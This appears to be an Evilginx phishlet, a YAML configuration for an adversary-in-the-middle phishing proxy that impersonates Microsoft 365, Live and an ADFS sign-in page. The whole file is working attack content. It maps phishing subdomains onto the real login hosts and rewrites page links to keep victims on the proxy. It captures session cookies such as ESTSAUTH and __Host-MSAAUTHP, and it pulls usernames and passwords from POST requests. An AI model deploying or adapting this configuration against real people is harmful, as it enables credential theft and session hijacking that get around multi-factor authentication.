author: '@froyo75'
min_ver: '3.2.0'
proxy_hosts:
   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true, auto_filter: true}
   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false, auto_filter: true}
   - {phish_sub: 'logon', orig_sub: 'login', domain: 'live.com', session: false, is_landing:false, auto_filter: true}
   - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'myapp.com', session: true, is_landing:false, auto_filter: true}
   - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'myapp.com:443', session: true, is_landing:false, auto_filter: true}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'adfs.myapp.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
  - domain: 'login.microsoftonline.com'
    #keys: ['SignInStateCookie:opt']
    keys: ['.*:regexp']
  - domain: '.live.com'
    keys: ['WLSSC:opt']
  - domain: 'login.live.com'
    keys: ['__Host-MSAAUTHP:opt']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
auth_urls:
  - '/common/SAS/ProcessAuth'
  - '/kmsi*'
login:
  domain: 'login.microsoftonline.com'
  path: '/'